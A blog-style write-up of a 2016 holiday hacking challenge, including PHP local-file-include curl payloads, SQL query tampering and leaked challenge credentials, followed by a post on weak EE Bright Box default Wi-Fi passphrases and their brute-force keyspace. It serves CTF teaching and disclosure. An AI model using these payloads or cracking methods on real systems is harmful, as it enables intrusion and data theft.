DGET /secondhalf.bin HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
TServer: SimpleHTTP/0.6 Python/2.7.12+
TDate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: application/octet-stream
UContent-Length: 1048097
Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT
3{"host_int": 266670160730277518981342002975279884847, "version": [2, 0], "displayname": "", "p
ort": 17500, "namespaces": [1149071040, 1139770785, 1357103393, 1296963687, 1139786665, 1261247
053, 1331126254, 1179166992, 1210559602, 1261612467, 1223790038, 1234538553, 1304191898, 124630
1403, 1056298300, 1207374239]}

We can see the output from a HTTP request to http://192.168.188.130/firsthalf.html which, in the response body, includes a hidden HTML field called part1 and with value santasli.

We could have a crack at the second half, which appears to be contained within the binary response body of a similar request to /secondhalf.bin, which would almost certainly require some tcpdump-fu, or we could take a (correct!) guess that the password to the door accompanying the terminal is santaslittlehelper.

Terminal - Workshop (near reindeer)

This temrinal greets us with the following banner

*******************************************************************************
*                                                                             *
* Find the passphrase from the wumpus.  Play fair or cheat; it's up to you.   * 
*                                                                             *
*******************************************************************************

We are running under the context of user elf and have a single file in our home directory, wumpus, which is an executable. For this challenge, I started out by just playing the game - it’s fairly simple to beat after all, and killed the Wumpus. I’m sorry Wumpus. WUMPUS IS MISUNDERSTOOD.

Later, I performed a more detailed analysis of the executable by encoding it as base64 out to the terminal, copying that to an isolated x86_64 Debian VM, and reverse engineering it using GDB.

We find that there are several command line options which can be supplied to the executable:

-a: specify number of arrows the player starts with
-b: specify number of bats present in the cave
-h: hard mode, which tightens constraints on starting positions and room/tunnel/bat/pit ratios and “last chances”
-p: specify number of pits present in the cave
-r: specify number of rooms in the cave
-t: specify number of tunnels in the cave

Some of these parameters have constraints applied to them, for example the number of rooms has to be greater than 5.

Using these parameters, we can cheat and make the game trivial to complete, for example by making a cave with 6 rooms and 5 tunnels, in which case we just shoot into every room from our starting room until we inevitably hit the poor Wumpus.

Terminal - Train

With this terminal, we are dropped into the “Train Management Console”. Using HELP drops us into a less session, presenting instructions on how to operate the train, along with a Cranberry pie recipe. As the instructions hint at, being in less gives us the ability to execute commands using !. Using !ls we can see the working directory contains three files: ActivateTrain, TrainHelper.txt and Train_Console.

TrainHelper.txt is presumably the file we’re reading, Train_Console is the “Train Management Console” we were dropped into in the first place, and ActivateTrain is an executable which triggers the ability to travel back in time. We can therefore call the ActivateTrain executable from the HELP context using !./ActivateTrain or we can also use strings on the console script to discover the passphrase of 24fb3e89ce2aa0ea422c3d511d40dd84 which can be used to START the train via the management console legitimately, once the brakes have been released with BRAKEOFF.

Terminal - Workshop (near staircase)

This terminal greets us with the following banner

*******************************************************************************
*                                                                             *
* To open the door, find the passphrase file deep in the directories.         * 
*                                                                             *
*******************************************************************************

Here, we use the find command to list the files and directories under the home folder recursively:

elf@019f15a853ea:~/.doormat$ find
.
./. 
./. / 
./. / /\
./. / /\/\\
./. / /\/\\/Don't Look Here!
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp
./. / /\/\\/Don't Look Here!/secret
./. / /\/\\/Don't Look Here!/files
./. / /\/\\/holiday
./. / /\/\\/temp
./. / /\/santa
./. / /\/ls
./. / /opt
./. / /var
./. /bin
./. /not_here
./share
./temp

We can see the file which we are probably interested in - key_for_the_door.txt - so we use find once again combined with the -exec flag to read its contents, without having to worry about traversing the awkwardly named directories ourselves:

elf@019f15a853ea:~/.doormat$ find -name 'key_for_the_door.txt' -exec cat {} \;
key: open_sesame

Terminal - Santa’s Office

This terminal drops us into another interactive script rather than a shell, and we are greet with the following famous line

GREETINGS PROFESSOR FALKEN.

This challenge requires that we answer the prompts as was done in the 1983 movie War Games, as follows:

GREETINGS PROFESSOR FALKEN.

Hello.


HOW ARE YOU FEELING TODAY?

I'm fine. How are you?


EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?

People sometimes make mistakes.


YES THEY DO. SHALL WE PLAY A GAME?

Love to. How about Global Thermonuclear War?


WOULDN'T YOU PREFER A GOOD GAME OF CHESS?

Later. Let's play Global Thermonuclear War.


FINE

,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 
2

AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 

Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 

LOOK AT THE PRETTY LIGHTS

Press Enter To Continue

Conclusion of Part 3

Between these terminals, we are granted access to all but one door in the quest world. By using the terminal in the workshop, beside the reindeer stables, allows us into the DFER (or Dungeon For Errant Reindeer), which is empty in the present day, but contains the captive Santa Claus if we travel back to 1978 using the train terminal.

Part 4: My Gosh… It’s Full of Holes

In this part, we exploit the following targets as referenced in the SantaGram android application, and as per Tom Hessman’s confirmation that they are in-scope.

The Mobile Analytics Server #1

This server appears to be an endpoint for collecting and querying analytics data. Retrieval of the first MP3 file on this site is trivial; we log into the web application using the credentials we recovered in part 2 (guest:busyreindeer78) and are presented with a menu item at the top labeled “MP3”. Clicking this downloads discombobulatedaudio2.mp3 (MD5 hash f05c1ec6c536e455ec686973fa6b8e20).

The Mobile Analytics Server #2

Using nmap to scan the analytics server, with the standard set of scripts enabled (thanks to Holly Evergreen from the quest world for the tip) yields the revelation that the source code for the web application is hosted on the server in the form of a bare git repositry at /.git/. Recursively download this bare repository and checking it out allows us the peruse the source code for the web application in its current state, as well as viewing the history of the development of the application.

From the history, we can see that the SQL for generating the database schema and static data for the site had in it at some point a set of credentials for the administrator user (introduced in commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0 and removed in commit 85a4207c178fa0f9c6b6bb77a6d42eac487159c0):

INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');

Trying these credentials in the web application reveals that this password has not been rotated since it was commited and removed from source control, and allows us to access more of the web application’s functionality, most intrestingly the “experiemental” ability to modify saved queries against the data.

By querying the data, making sure to save it which returns us the key (a GUID) for the query, and using the edit functionality, we are able to modify the SQL statement for that question due to the way the edit.php code searches GET query parameters exhaustively for those matching the columns from the schema in the database (whilst the UI only allows editing of the query name and description. The vulnerable code is shown below:

    # Update the row with the new values
    $set = [];
    foreach($row as $name => $value) {
      print "Checking for " . htmlentities($name) . "...<br>";
      if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . "'";
      }
    }

    $query = "UPDATE `reports` " .
      "SET " . join($set, ', ') . ' ' .
      "WHERE `id`='" . mysqli_real_escape_string($db, $_REQUEST['id']) . "'";
    print htmlentities($query);

    $result = mysqli_query($db, $query);

Thus by examining the schema, specifically the audio table which holds the MP3 metadata and blobs, we are able to modify a saved query with SQL constructed such that it will divulge the contents of the table in an HTML-friendly format (base64 encoding the MP3 blob using MySQL’s handy TO_BASE64 builtin function):

SELECT id,username,filename,TO_BASE64(mp3) FROM audio;

which gives us

`id`	`username`	`filename`	`mp3`
`20c216bc-b8b1-11e6-89e1-42010af00008`	`guest`	`discombobulatedaudio2.mp3`	omitted
`3746d987-b8b1-11e6-89e1-42010af00008`	`administrator`	`discombobulatedaudio7.mp3`	omitted

We can then take the base64 encoding of the discombobulatedaudio7.mp3 file (MD5 hash 313e7e370fd7d5232bb569f21856d9f4) and recover the audio file for later analysis.

The Dungeon Game

Whilst conducting our adventure is the quest world, we are told by various NPCs about a game called “Dungeon” which is played by Pepper Mintstix, who provides us with a link (http://www.northpolewonderland.com/dungeon.zip) to an old copy of the game. Downloading and extract this yields an ELF 64-bit executable called dungeon as well as what turns out to be an encrypted assets file called dtextc.dat.

Executing the dungeon file in an isolated VM indeed drops us into a game of dungeon, otherwise known as Zork, one of the earliest interactive fiction computer games.

Playing the game through to completion seems like it could waste a considerable amount of time, so let’s consider alternative approaches to beating it.

My first port of call was to download and compile a tool for decrypting the resources file. Perusing the resources file shows that even if we are able to beat the local copy of the game by getting to the room containing the elf and presenting him with an item, he will tell us that we have complete the online version - presumably located somewhere on dungeon.northpolewonderland.com.

Portscanning this host shows an unusual open port listening on TCP/11111, and surely enough by connecting to this socket with netcat we see what looks like a hosted, interactive service running a copy of dungeon.

Since we will be unable to access the hosted dtextc.dat file in which our desired information presumably lies, we will have to figure out how to complete the game only by interacting with it. Fortunately, research turns up a hidden interactive debugger built into some versions of the game called GDT, which is indeed present in the downloaded and hosted version, which we are able to use to cheat and reach the completion scenario with easy. We therefore connect to the hosted game and use the correct incantations to get the information we need, shown below:

$ nc 35.184.47.139 11111            
Welcome to Dungeon.                     This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>TK
Entry:    154
Taken.
GDT>AH
Old=      2      New= 192
GDT>exit
>look
You have mysteriously reached the North Pole.
In the distance you detect the busy sounds of Santa's elves in full
production.

You are in a warm room, lit by both the fireplace but also the glow of
centuries old trophies.
On the wall is a sign:
                Songs of the seasons are in many parts
                To solve a puzzle is in our hearts
                Ask not what what the answer be,
                Without a trinket to satisfy me.
The elf is facing you keeping his back warmed by the fire.
>inventory
You are carrying:
  A jewel-encrusted egg.
>give elf egg
The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.
The elf says - you have conquered this challenge - the game will now end.
Your score is 5 [total of 585 points], in 5 moves.
This gives you the rank of Beginner.

Following the instructions and sending an e-mail to peppermint@northpolewonderland.com we receive a prompt reply with the discombobulatedaudio3.mp3 file (MD5 hash 0be15d00299af1a6bc1d11ab6f2696a0) attached.

The Debug Server

From examining the SantaGram Android application string resources, we see from the following lines that the debug server endpoint is located at dev.northpolewonderland.com and, more interestingly that debug data collection is disabled by default, which would explain why we didn’t see any traffic to this endpoint whilst exercise the app as-is.

    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
    <string name="debug_data_enabled">false</string>

By changing this value to true, re-assembling the Android application and signing it with our own key, we are able to load the modified version of the application into our emulator. Grepping the smali for the string debug suggests that the debug-reporting behaviour should be triggered by visiting the EditProfile activity. Doing so causes the following HTTP request to be made (JSON formatting mine throughout):

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; Samsung Galaxy S4 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P)
Host: dev.northpolewonderland.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 155

{
    "date": "20161218140911-0500",
    "freemem": -1,
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "udid": "91104f4f660a1469"
}

with response as follows:

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Dec 2016 00:36:01 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 244

{
    "date": "20161219003601",
    "status": "OK",
    "filename": "debug-20161219003601-0.txt",
    "request": {
        "date": "20161218140911-0500",
        "freemem": -1,
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "udid": "91104f4f660a1469",
        "verbose": false
    }
}

We see that the request payload is reflected back to us in the response, but includes an extra parameter that we did not specify named verbose, by crafting our own request to include this parameter with its value set to true, the server responds with a list of the reports that it has (which appear to be cleared out periodically, judging by the way the list changes over time):

POST /index.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; Samsung Galaxy S4 - 4.4.4 - API 19 - 1080x1920 Build/KTU84P)
Host: dev.northpolewonderland.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 155

{
    "date": "20161218140911-0500",
    "freemem": -1,
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "udid": "91104f4f660a1469",
    "verbose": true
}    

HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Mon, 19 Dec 2016 00:36:21 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 691

{
    "date": "20161219003621",
    "date.len": 14,
    "status": "OK",
    "status.len": "2",
    "filename": "debug-20161219003621-0.txt",
    "filename.len": 26,
    "request": {
        "date": "20161218140911-0500",
        "freemem": -1,
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "udid": "91104f4f660a1469",
        "verbose": true
    },
    "files": [
        "debug-20161219002320-0.txt",
        "debug-20161219002349-0.txt",
        "debug-20161219002443-0.txt",
        "debug-20161219002507-0.txt",
        "debug-20161219002552-0.txt",
        "debug-20161219002648-0.txt",
        "debug-20161219003121-0.txt",
        "debug-20161219003452-0.txt",
        "debug-20161219003559-0.txt",
        "debug-20161219003601-0.txt",
        "debug-20161219003617-0.txt",
        "debug-20161219003621-0.txt",
        "debug-20161224235959-0.mp3",
        "index.php"
    ]
}

Notice debug-20161224235959-0.mp3 - this must be another discombobulated audio file! Surely enough, we can download this simply by making a GET request to http://dev.northpolewonderland.com/debug-20161224235959-0.mp3 (MD5 hash 0a5ef5d7a0e89658a833d1892a9e1ec6).

This endpoint, http://ads.northpolewonderland.com, is used to serve up advertisements within the SantaGram Android application. Visiting the site in a browser (with our ad-blocker disabled, as it seems to interfere with the site) reveals a web application built using the Meteor framework.

Using the information available on Ed Skoudis’s SANS blog post, Mining Meteor, we can use the TamperMonkey script MeteorMiner to inspect the routes available in the web application. Navigating to the /admin/quotes route, we notice a subscription to the adminQuotes publication, which contains amongst it’s collections an entry with a property called audio and value /ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3. Fetching this resource from http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3 gives us another audio file (MD5 hash 3d87c1d31717f81f1966db4133f9e24d).

The Uncaught Exception Handler Server

Looking at the request (truncated for brevity) and response which is sent/received by the Android application reports an unhandled exception, we see the following:

POST http://ex.northpolewonderland.com/exception.php HTTP/1.1
Content-Type: application/json
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; ONE A2003 Build/MMB29M)
Connection: Keep-Alive
Content-Length: 1269
Host: ex.northpolewonderland.com

{
    "operation": "WriteCrashDump",
    "data": {
        "message": "Invalid index 0, size is 0",
        ...
    }
}
 
HTTP/1.1 200 OK
Server: nginx/1.10.2
Date: Thu, 15 Dec 2016 15:33:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "crashdump-Ez9xc2.php"
}

From here, we can fuzz the request payload and examine the server’s response to try and built a mental model of the functionality supported by this endpoint:

$ curl http://ex.northpolewonderland.com/exception.php \
    -d '{}'
Content type must be: application/json

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{}'
Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump"}'
Fatal error! JSON key 'data' must be set.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {}}'
Fatal error! JSON key 'crashdump' must be set.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {"crashdump":"crashdump-Ez9xc2.php"}}'
Fatal error! crashdump value duplicate '.php' extension detected.

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {"crashdump":"crashdump-Ez9xc2"}}'
<<response body contains what we submitted in the dump data>>

At this point, we can start to think about what vulnerabilities might exist. As per the hints from Sugarplum Mary in the quest world, we could think about PHP I/O streams as a potential vector, and using another SANS blog post, Getting MOAR Value out of PHP Local File Include Vulnerabilities by Ed Skoudis, we can use the ReadCrashDump functionality to read the source for exception.php (with the exception being automatically added by the code on the remote end) by passing a PHP stream filter as the crashdump argument:

$ curl http://ex.northpolewonderland.com/exception.php \
    -H 'Content-Type: application/json' \
    -d '{"operation":"ReadCrashDump", "data": {"crashdump":"php://filter/convert.base64-encode/resource=exception"}}'

Base64 decoding the output from this gives us the source for the webpage:

<?php 

## Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

## Code from http://thisinterestsme.com/receiving-json-post-data-via-php/
## Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST\n");
}
	 
## Make sure that the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json\n");
}
	
## Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
	# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON!\n");
}

## Process the JSON.
if ( ! isset( $obj['operation']) or (
	$obj['operation'] !== "WriteCrashDump" and
	$obj['operation'] !== "ReadCrashDump"))
	{
	die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
if ( isset($obj['data'])) {
	if ($obj['operation'] === "WriteCrashDump") {
		# Write a new crash dump to disk
		processCrashDump($obj['data']);
	}
	elseif ($obj['operation'] === "ReadCrashDump") {
		# Read a crash dump back from disk
		readCrashdump($obj['data']);
	}
}
else {
	# data key unset
	die("Fatal error! JSON key 'data' must be set.\n");
}
function processCrashdump($crashdump) {
	$basepath = "/var/www/html/docs/";
	$outputfilename = tempnam($basepath, "crashdump-");
	unlink($outputfilename);
	
	$outputfilename = $outputfilename . ".php";
	$basename = basename($outputfilename);
	
	$crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
	file_put_contents($outputfilename, $crashdump_encoded);
			
	print <<<END
{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "$basename"
}

END;
}
function readCrashdump($requestedCrashdump) {
	$basepath = "/var/www/html/docs/";
	chdir($basepath);		
	
	if ( ! isset($requestedCrashdump['crashdump'])) {
		die("Fatal error! JSON key 'crashdump' must be set.\n");
	}

	if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
		die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
	}
	else {
		require($requestedCrashdump['crashdump'] . '.php');
	}	
}

?>

At the top of the source, we see a handy code comment which reveals the location of the audio file, http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3 which we can download using a standard GET request (MD5 sum 4ee86b5b0eef9f8815ee7446272a6c06).

Summary

In total, between the six exploits explored above and the APK embedded resources, we have seven audio files:

filename	md5sum
`discombobulatedaudio1.mp3`	`b7aca2f218c39b997bfd61b83856aed2`
`discombobulatedaudio2.mp3`	`f05c1ec6c536e455ec686973fa6b8e20`
`discombobulatedaudio3.mp3`	`0be15d00299af1a6bc1d11ab6f2696a0`
`debug-20161224235959-0.mp3`	`0a5ef5d7a0e89658a833d1892a9e1ec6`
`discombobulatedaudio5.mp3`	`3d87c1d31717f81f1966db4133f9e24d`
`discombobulated-audio-6-XyzE3N9YqKNH.mp3`	`4ee86b5b0eef9f8815ee7446272a6c06`
`discombobulatedaudio7.mp3`	`313e7e370fd7d5232bb569f21856d9f4`

See part 5 for their analysis, and to find out who the perpetrator was!

Part 5: Discombobulated Audio

Now that we have all of the discombobulated audio files, it’s time to figure out what they mean. From listening to some of the files, it sounds like there might be some slowed-down speech, so by speeding up the tracks with trial and error using Audacity, and putting them in order of their filenames (with the `debug-…0.mp3 slotting in between file 3 and 5), we end up with a coherent, and familiar, sentence:

"Father Christmas, Santa Claus. Or, as I've always known him, Jeff."
                 ~ The Doctor
                   Doctor Who, A Christmas Carol (2010)

This turns out to be the passphrase for the final door (the one lacking a terminal) in “The Corridor” area of the quest world, and allows us access to The Clock Tower in both the present day and in 1978. Climbing the The Clock Tower the present day, we find none other than the Doctor himself, who admits to kidnapping Santa!

The Doctor explains his reasoning in his epilogue; he wished to take Santa back to 1978 and use his magick to prevent the release of the Star Wars Holiday Special.

<Dr. Who> - The question of the hour is this: Who nabbed Santa.
<Dr. Who> - The answer? Yes, I did.
<Dr. Who> - Next question: Why would anyone in his right mind kidnap Santa Claus?
<Dr. Who> - The answer: Do I look like I'm in my right mind? I'm a madman with a box.
<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. 
            In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. 
            People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.
<Dr. Who> - Give me a world like that. Just once.
<Dr. Who> - So I did what I had to do. 
            I knew that Santa's powerful North Pole Wonderland Magick could prevent the Star Wars Special from being released, 
            if I could leverage that magick with my own abilities back in 1978. 
            But Jeff refused to come with me, insisting on the mad idea that it is better to maintain the integrity of the universe’s timeline. 
            So I had no choice – I had to kidnap him.
<Dr. Who> - It was sort of one of those days.
<Dr. Who> - Well. You know what I mean.
<Dr. Who> - Anyway... Since you interfered with my plan, we'll have to live with the Star Wars Holiday Special in this universe... FOREVER.
            If we attempt to go back again, to cross our own timeline, we'll cause a temporal paradox, a wound in time.
<Dr. Who> - We'll never be rid of it now. The Star Wars Holiday Special will plague this world until time itself ends... 
            All because you foiled my brilliant plan

EE Bright Box default WPA passphrases are not secure

Wed, 29 Jul 2015 00:00:00 +0000

Background

The security of consumer wireless routers has come a long way over the years.

In terms of the technology available, we’ve gone from completely unprotected wireless networks being the norm, seen the rise and fall of the fundamentally broken WEP algorithm, and arrived at the relative security of WPA/WPA2.

A wireless network protected by WPA/WPA2 using a pre-shared key (which is what you’d encounter in typical home setups), however, is only as secure as the key itself; the handshake between a wireless device and wireless router is all you need to capture in order to perform an offline brute-force attack and recover a weak passphrase; the passphrases needs to be strong.

The current state of play

A new broadband customer will typically go through the following process when they join a provider and receive their shiny, new router:

Plug the router and necessary cables in
Enter the default passphrase from the label on the back/bottom of the router into their wireless devices
Get on with the rest of their life

The majority of users neither know nor care about the security afforded to their wireless network out of the box - if there’s a password to get in, then it’s secure, right?

And so we have the situation where the majority of home wireless networks out there still use the encryption algorithm and passphrase that the router came configured with. For routers made within the last few years the former will almost certainly be WPA/WPA2, but when it comes to the default passphrase, there are manufacturers who still get this wrong.

EE Bright Box

Case in point is the EE Bright Box, the router provided by UK mobile, phone, television and broadband provider EE. Here’s an example of what you’ll find on the back of the router:

We see the default passphrase for the wireless network this router will present to the world is gum-sleep-free.

Well, 14 characters isn’t bad at all - were it completely random, such as Cxa?x'(|,&}Yx#, then we’d have been on to a winner - however this is far from random; it has structure.

So what’s the structure?

I took to the internet, and despite there not being any mainstream articles covering the inadequate security shipped with the EE Bright Box, I quickly stumbled upon a relevant discussion on the HashKiller forum.

Users of the forum had gathered Bright Box handshakes from across the UK (to which I contributed one of my own) to analyse exactly how susceptible these default passphrases were to dictionary attack. As it turned out the answer is “quite”.

All of the harvested passphrases took the form of three “dictionary” words - one of length 3, one of length 4, and one of length 5 - joined by a ‘-‘, in any permutation. Here’s an exhaustive list of the discovered passphrases posted on the forum:

5-4-3

horse-duck-dog
route-know-apt
guest-mean-apt
nerve-pick-six
truck-rank-few

4-5-3

cash-sting-six
vase-boast-own
farm-blend-own
want-dwell-fit
curb-appal-top

4-3-5

wait-rob-weary

3-4-5

dog-duck-horse
ant-stab-ideal
cue-reply-such

3-5-4

gum-sleep-free
pea-share-nice
leg-draft-good
use-teach-thin
toe-guard-calm
tea-yield-dear

5-3-4

alarm-rub-male
label-fan-cool

Close inspection of the list shows that there are common words across the different passphrases, too: apt, dog, own, six, duck and horse all appear more than once, suggesting that the “dictionary” from which they are taken may be rather small. Also, as pointed out by one of the forum members, the presence of “appal” also suggests that this is a UK English dictionary, as this is spelt “appall” in US English.

Keyspace estimation

Taking the british-english-small wordlist, we have 484 three-letter words, 1,919 four-letter words, and 3,557 five-letter words, giving 19,822,364,232 possible passphrases across the six permutations. On modern hardware, you can try nearly 1,000,000 of these per second, yielding the correct passphrase (assuming the consitutent words are in the dictionary chosen above) in little over 7 hours.

Conclusion

If you’re reading this and have an EE Bright Box with the default passphrase, go change it! Better still, router manufacturers need to do a better job of supplying equipment with secure default configurations; breaking into a wireless network should take an order of years or decades, not hours.